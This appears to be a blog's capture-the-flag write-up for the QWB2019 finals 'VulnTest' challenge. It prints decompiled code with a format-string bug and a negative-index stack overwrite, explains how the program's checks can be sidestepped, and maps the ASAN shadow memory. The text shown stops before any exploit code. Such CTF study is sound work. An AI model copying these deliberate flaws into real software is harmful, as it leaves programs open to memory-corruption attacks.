<!doctype html>



  



    
  

<html class="theme-next logos use-motion" lang="zh-hk">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.useso.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Hexo, NexT">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0">






<meta name="description" content="本来以为去年的春节已经足够不堪了，怎料今年更是难上加难。 第一次在外地过年就遇上疫情爆发的事情，本来计划家人来过年也只能取消了。不过不能出门正好也拥有了大段空闲时间，与其像朋友圈里面的各位花式秀无聊，不如静下心来攻克之前没有完成的一些题目。 This is a challenge from QiangWangBei Finals last year, it’s a RealWorld challe">
<meta property="og:type" content="article">
<meta property="og:title" content="[QWB2019 Finals] VulnTest">
<meta property="og:url" content="http://matshao.com/2020/01/28/QWB2019-Finals-VulnTest/index.html">
<meta property="og:site_name" content="Mid Station">
<meta property="og:description" content="本来以为去年的春节已经足够不堪了，怎料今年更是难上加难。 第一次在外地过年就遇上疫情爆发的事情，本来计划家人来过年也只能取消了。不过不能出门正好也拥有了大段空闲时间，与其像朋友圈里面的各位花式秀无聊，不如静下心来攻克之前没有完成的一些题目。 This is a challenge from QiangWangBei Finals last year, it’s a RealWorld challe">
<meta property="og:locale" content="zh-hk">
<meta property="og:updated_time" content="2020-01-28T13:26:04.700Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[QWB2019 Finals] VulnTest">
<meta name="twitter:description" content="本来以为去年的春节已经足够不堪了，怎料今年更是难上加难。 第一次在外地过年就遇上疫情爆发的事情，本来计划家人来过年也只能取消了。不过不能出门正好也拥有了大段空闲时间，与其像朋友圈里面的各位花式秀无聊，不如静下心来攻克之前没有完成的一些题目。 This is a challenge from QiangWangBei Finals last year, it’s a RealWorld challe">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Logos',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://matshao.com/2020/01/28/QWB2019-Finals-VulnTest/">





  <title> [QWB2019 Finals] VulnTest | Mid Station </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-hk">

  





<script>
  	var _mtac = {};
  	(function() {
  		var mta = document.createElement("script");
  		mta.src = "http://pingjs.qq.com/h5/stats.js?v2.0.4";
  		mta.setAttribute("name", "MTAH5");
  		mta.setAttribute("sid", "500688563");
  		var s = document.getElementsByTagName("script")[0];
  		s.parentNode.insertBefore(mta, s);
  	})();
</script>





  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="header-logos"> 
      <div class="site-meta ">
  
    <div class="site-meta-headline">
      <a href="/">
        <img class="custom-logo-image" src="/images/logo_light.png" alt="Mid Station">
      </a>
    </div>
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Mid Station</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
    
      <p class="site-subtitle"></p>
    
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            歸檔
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            關於
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 
            
      </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://matshao.com/2020/01/28/QWB2019-Finals-VulnTest/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="Matthew Shao">
    <meta itemprop="description" content>
    <meta itemprop="image" content="/images/avatar.gif">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Mid Station">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="Mid Station" src="/images/logo_light.png">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                [QWB2019 Finals] VulnTest
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-01-28T15:50:10+08:00">
                2020-01-28
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分類於</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Hack/" itemprop="url" rel="index">
                    <span itemprop="name">Hack</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本来以为去年的春节已经足够不堪了，怎料今年更是难上加难。<br>
第一次在外地过年就遇上疫情爆发的事情，本来计划家人来过年也只能取消了。不过不能出门正好也拥有了大段空闲时间，与其像朋友圈里面的各位花式秀无聊，不如静下心来攻克之前没有完成的一些题目。</p>
<p>This is a challenge from QiangWangBei Finals last year, it’s a RealWorld challenge. Only about 3~4 teams were able to finish it in the game. You can download the challenge files <a href="https://drive.google.com/file/d/1_qbD1Mwwqq6uZ6Wa_pqsi2uXwwktgNC6/view?usp=sharing" target="_blank" rel="noopener">here</a>. The challenge is called <code>VulnTest</code>, it contains some obvious bugs but the difficulty lies in the exploitation. It was compiled with <code>AddressSanitizer</code>(ASAN), which is designed to detect the memory corruption thoroughly, so it could provide extra protection for the program. If a vulnerability is triggered, it can be detected as soon as possible and the program died out.</p>
<a id="more"></a>
<h2 id="recon"><a class="header-anchor" href="#recon">¶</a>Recon</h2>
<p>Because of the ASAN insturmentation, the decompilation result from IDA is hard to read. But you can still ignore all the instrumentation stuff and recongize the core logic of the program. It is nothing new but another “menu challenge”. It provides 3 tests.</p>
<h3 id="test1"><a class="header-anchor" href="#test1">¶</a>Test1</h3>
<p>Test1 have <code>Write Card</code> and <code>Show Card</code> options, it is a test of format string vulnerability.</p>
<h4 id="write-card"><a class="header-anchor" href="#write-card">¶</a>Write Card</h4>
<p>This function provides a chance to write <code>7 bytes</code> to a stack buffer. And it will check if the inputed string contains <code>%</code> character, if it does, it will go on to check if it contains any character from <code>$dufscnpexXog</code>, in the hope of preventing format string attack.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">char</span> *__<span class="function">fastcall <span class="title">write_card1</span><span class="params">(<span class="keyword">char</span> *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 v1; <span class="comment">// rax</span></span><br><span class="line">  <span class="keyword">char</span> *result; <span class="comment">// rax MAPDST</span></span><br><span class="line">  <span class="keyword">char</span> v3; <span class="comment">// dl</span></span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+14h] [rbp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v1 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"Input your test string:"</span>);</span><br><span class="line">  <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v1, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line">  <span class="built_in">memset</span>(a1, <span class="number">0</span>, <span class="number">0x10</span>uLL);</span><br><span class="line">  read_into((<span class="keyword">unsigned</span> __int64)a1, <span class="number">7L</span>L);</span><br><span class="line">  result = <span class="built_in">strchr</span>(a1, <span class="string">'%'</span>);</span><br><span class="line">  <span class="keyword">if</span> ( result )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">12</span>; ++i )</span><br><span class="line">    &#123;</span><br><span class="line">      v3 = *(_BYTE *)(((<span class="keyword">unsigned</span> __int64)&amp;a1[i + <span class="number">0x20</span>] &gt;&gt; <span class="number">3</span>) + <span class="number">0x7FFF8000</span>);</span><br><span class="line">      <span class="keyword">if</span> ( v3 != <span class="number">0</span> &amp;&amp; ((i + <span class="number">0x20</span> + (<span class="keyword">unsigned</span> __int8)a1) &amp; <span class="number">7</span>) &gt;= v3 )</span><br><span class="line">        __asan_report_load1((__int64)&amp;a1[i + <span class="number">0x20</span>]);<span class="comment">// $dufscnpexXog</span></span><br><span class="line">      result = <span class="built_in">strchr</span>(result, a1[i + <span class="number">0x20</span>]);</span><br><span class="line">      <span class="keyword">if</span> ( result )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"Format string detected!!"</span>);</span><br><span class="line">        __asan_handle_no_return();</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="show-card"><a class="header-anchor" href="#show-card">¶</a>Show Card</h4>
<p>This function contains a format string vulnerability, it can use the inputed string from <code>Write Card</code> as the format string to <code>sprintf</code>. Also, the sprintf arguments are over-lapping each other, it could cause unexpected behavior. To mitigate the format string vulnerability, it added a check to see if two arguments equals after the formatting process. If they are not equal, the program exits.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">fastcall <span class="title">show_card1</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 v1; <span class="comment">// rax</span></span><br><span class="line">  __int64 v2; <span class="comment">// rax</span></span><br><span class="line">  __int64 v3; <span class="comment">// rax</span></span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">char</span> *format; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  format = (<span class="keyword">char</span> *)a1;</span><br><span class="line">  v1 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"Oh!It's incredible."</span>);</span><br><span class="line">  v2 = <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v1, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line">  v3 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(v2, <span class="string">"There is a format string!"</span>);</span><br><span class="line">  <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v3, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line">  <span class="built_in">memset</span>((<span class="keyword">void</span> *)(a1 + <span class="number">16</span>), <span class="number">0</span>, <span class="number">0x10</span>uLL);</span><br><span class="line">  <span class="built_in">sprintf</span>(format + <span class="number">16</span>, format); <span class="comment">// format string vulns!!!</span></span><br><span class="line">  <span class="keyword">if</span> ( *(_BYTE *)(((<span class="keyword">unsigned</span> __int64)(format + <span class="number">16</span>) &gt;&gt; <span class="number">3</span>) + <span class="number">0x7FFF8000</span>) != <span class="number">0</span></span><br><span class="line">    &amp;&amp; (((<span class="keyword">unsigned</span> __int8)format + <span class="number">16</span>) &amp; <span class="number">7</span>) &gt;= *(_BYTE *)(((<span class="keyword">unsigned</span> __int64)(format + <span class="number">16</span>) &gt;&gt; <span class="number">3</span>) + <span class="number">0x7FFF8000</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    __asan_report_load1((__int64)(a1 + <span class="number">16</span>));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( a1[<span class="number">16</span>] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( <span class="built_in">strcmp</span>(a1 + <span class="number">16</span>, a1) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"You can't test dangerous characters"</span>);</span><br><span class="line">      __asan_handle_no_return();</span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Your data:"</span>);</span><br><span class="line">    result = <span class="built_in">puts</span>(a1 + <span class="number">16</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    result = <span class="built_in">puts</span>(<span class="string">"It seems that you think the test is boring. \nLet's finish it ahead of time."</span>);</span><br><span class="line">    TEST1_DONE = <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="test2"><a class="header-anchor" href="#test2">¶</a>Test2</h3>
<p>Test1 also have <code>Write Card</code> and <code>Show Card</code> options, it is a test of Out-of-Bound Write Vulnerability.</p>
<h4 id="write-card-v2"><a class="header-anchor" href="#write-card-v2">¶</a>Write Card</h4>
<p>We can write data to a <code>0x30</code> sized buffer on the stack, and we can specify the index of where to write. It has check to see if the start index greater than <code>0x30</code>, but the index could be negative, that means we can overwrite the content before the target buffer.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">size = get_int();</span><br><span class="line"> <span class="keyword">if</span> ( size &gt; <span class="number">47</span> )</span><br><span class="line"> &#123;</span><br><span class="line">   v6 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"You must enter 0~47!"</span>);</span><br><span class="line">   v7 = <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v6, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line">   v8 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(v7, <span class="string">"Bye~"</span>);</span><br><span class="line">   <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v8, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line">   __asan_handle_no_return();</span><br><span class="line">   <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="built_in">memset</span>(a1, <span class="number">0</span>, <span class="number">0x30</span>uLL);</span><br><span class="line"> ...</span><br><span class="line"> a1[size] = v9;</span><br><span class="line"> v11 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"Oh!It's incredible."</span>);</span><br><span class="line"> v12 = <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v11, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line"> v13 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(v12, <span class="string">"There is a stack overflow!"</span>);</span><br><span class="line"> <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v13, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line"> <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line"> &#123;</span><br><span class="line">   <span class="keyword">if</span> ( *(<span class="keyword">char</span> *)(((v1 + <span class="number">32</span>) &gt;&gt; <span class="number">3</span>) + <span class="number">0x7FFF8000</span>) &lt; <span class="number">0</span> )</span><br><span class="line">     __asan_report_load1(v1 + <span class="number">32</span>);</span><br><span class="line">   <span class="keyword">if</span> ( *(_BYTE *)(v1 + <span class="number">32</span>) == <span class="number">10</span> )</span><br><span class="line">     <span class="keyword">break</span>;</span><br><span class="line">   <span class="built_in">scanf</span>(<span class="string">"%c"</span>, v1 + <span class="number">32</span>);</span><br><span class="line">   <span class="keyword">if</span> ( *(<span class="keyword">char</span> *)(((v1 + <span class="number">32</span>) &gt;&gt; <span class="number">3</span>) + <span class="number">0x7FFF8000</span>) &lt; <span class="number">0</span> )</span><br><span class="line">     __asan_report_load1(v1 + <span class="number">32</span>);</span><br><span class="line">   <span class="keyword">if</span> ( !*(_BYTE *)(v1 + <span class="number">32</span>) )</span><br><span class="line">     <span class="keyword">break</span>;</span><br><span class="line">   <span class="keyword">if</span> ( *(<span class="keyword">char</span> *)(((v1 + <span class="number">32</span>) &gt;&gt; <span class="number">3</span>) + <span class="number">0x7FFF8000</span>) &lt; <span class="number">0</span> )</span><br><span class="line">     __asan_report_load1(v1 + <span class="number">32</span>);</span><br><span class="line">   v14 = *(_BYTE *)(v1 + <span class="number">32</span>);</span><br><span class="line">   v15 = *(_BYTE *)(((<span class="keyword">unsigned</span> __int64)&amp;a1[size] &gt;&gt; <span class="number">3</span>) + <span class="number">0x7FFF8000</span>);</span><br><span class="line">   <span class="keyword">if</span> ( v15 != <span class="number">0</span> &amp;&amp; ((size + (<span class="keyword">unsigned</span> __int8)a1) &amp; <span class="number">7</span>) &gt;= v15 )</span><br><span class="line">     __asan_report_store1(&amp;a1[size]);</span><br><span class="line">   a1[size] = v14;</span><br><span class="line">   <span class="keyword">if</span> ( *(_BYTE *)(v1 + <span class="number">32</span>) == <span class="number">10</span> )</span><br><span class="line">   &#123;</span><br><span class="line">     a1[size] = <span class="number">0</span>;</span><br><span class="line">     <span class="keyword">break</span>;</span><br><span class="line">   &#125;</span><br><span class="line">   ++size;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>
<h4 id="read-card"><a class="header-anchor" href="#read-card">¶</a>Read Card</h4>
<p>Just an output function for the target buffer.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">__int64 __<span class="function">fastcall <span class="title">show_card2</span><span class="params">(__int64 a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 v1; <span class="comment">// rax</span></span><br><span class="line">  __int64 v2; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  v1 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"There is your note:"</span>);</span><br><span class="line">  <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v1, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line">  v2 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, a1);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v2, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="test3"><a class="header-anchor" href="#test3">¶</a>Test3</h3>
<p>Test3 is a tyical heap challenge test, it contains <code>add</code>, <code>delete</code>, <code>edit</code>, <code>open</code>. This test is only avaliable if Test1 and Test2 have been visited. I reversed the whole thing and there is an obvious use-after-free vulnerability. Because of the protection of ASAN, it could be hard to exploit. I did not use any function of the Test3 in my exploit, so I won’t post the psedo-code here to save some space.</p>
<h3 id="main"><a class="header-anchor" href="#main">¶</a>Main</h3>
<p>It seems the vulnerabilities from these test function are well protected by the checks or ASAN mechanism, but since the variable/buffer are all located on stack, it is possible to influence mutually. The first thing to do is finding out the layout of these variable/buffer.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">context</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">char</span> header[<span class="number">0x20</span>];</span><br><span class="line">  <span class="keyword">char</span> buf_test1[<span class="number">0x60</span>];</span><br><span class="line">  <span class="keyword">char</span> buf_test2[<span class="number">0x60</span>];</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">buf_test3</span> &#123;</span></span><br><span class="line">      __int64 key;</span><br><span class="line">      __int64 ptr;</span><br><span class="line">  &#125;[<span class="number">0x10</span>];</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>We can read the psuedo code and construct the layout above, but if we attach gdb to view the memory, we can see the following memory layout. On the left is the actual memory layout on the stack, on the right is so call <code>shadow memory</code>, which is another memory mapping to trace the usage of the memory, in order to detect overflow or other memory corruption.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">                        shadow memory</span><br><span class="line">       +----------------+-----------+</span><br><span class="line">       |    header      |           |</span><br><span class="line">       |                |f1 f1 f1 f1|</span><br><span class="line">       +----------------------------+</span><br><span class="line">       |    buf_test1   |           |</span><br><span class="line">       |    <span class="number">0x2d</span>        |           |</span><br><span class="line">       |            +---+           |</span><br><span class="line"><span class="number">0x60</span>   +------------+XXX|      f2 f2|</span><br><span class="line">       |XXX Red Zone XXX|f2 f2 f2 f2|</span><br><span class="line">       |XXXXXXXXXXXXXXXX|           |</span><br><span class="line">       |XXXXXXXXXXXXXXXX|           |</span><br><span class="line">       +----------------------------+</span><br><span class="line">       |    buf_test2   |           |</span><br><span class="line">       |    <span class="number">0x30</span>        |           |</span><br><span class="line">       |                |           |</span><br><span class="line"><span class="number">0x60</span>   +----------------+           |</span><br><span class="line">       |XXX Red Zone XXX|f2 f2 f2 f2|</span><br><span class="line">       |XXXXXXXXXXXXXXXX|f2 f2      |</span><br><span class="line">       |XXXXXXXXXXXXXXXX|           |</span><br><span class="line">       +----------------------------+</span><br><span class="line">       |    buf_test3   |           |</span><br><span class="line">       |    <span class="number">0xa0</span>        |           |</span><br><span class="line">       |                |           |</span><br><span class="line"><span class="number">0xa0</span>   |                |           |</span><br><span class="line">       |                |           |</span><br><span class="line">       |     ......     |           |</span><br><span class="line">       +----------------------------+</span><br><span class="line">       |                |f3 f3 f3 f3|</span><br><span class="line">       |                |           |</span><br><span class="line">       +----------------+-----------+</span><br></pre></td></tr></table></figure>
<p>For a complete explanation of the algorithm, you can refer to <a href="https://github.com/google/sanitizers/wiki/AddressSanitizerAlgorithm" target="_blank" rel="noopener">AddressSanitizerAlgorithm</a>.<br>
For this challenge, we only need to know two points:</p>
<ol>
<li><code>Shadow = (Mem &gt;&gt; 3) + 0x7fff8000;</code></li>
<li>The byte used in shadow memory:<br>
<code>f1</code>: Stack left redzone<br>
<code>f2</code>: Stack mid redzone<br>
<code>f3</code>: Stack right redzone</li>
</ol>
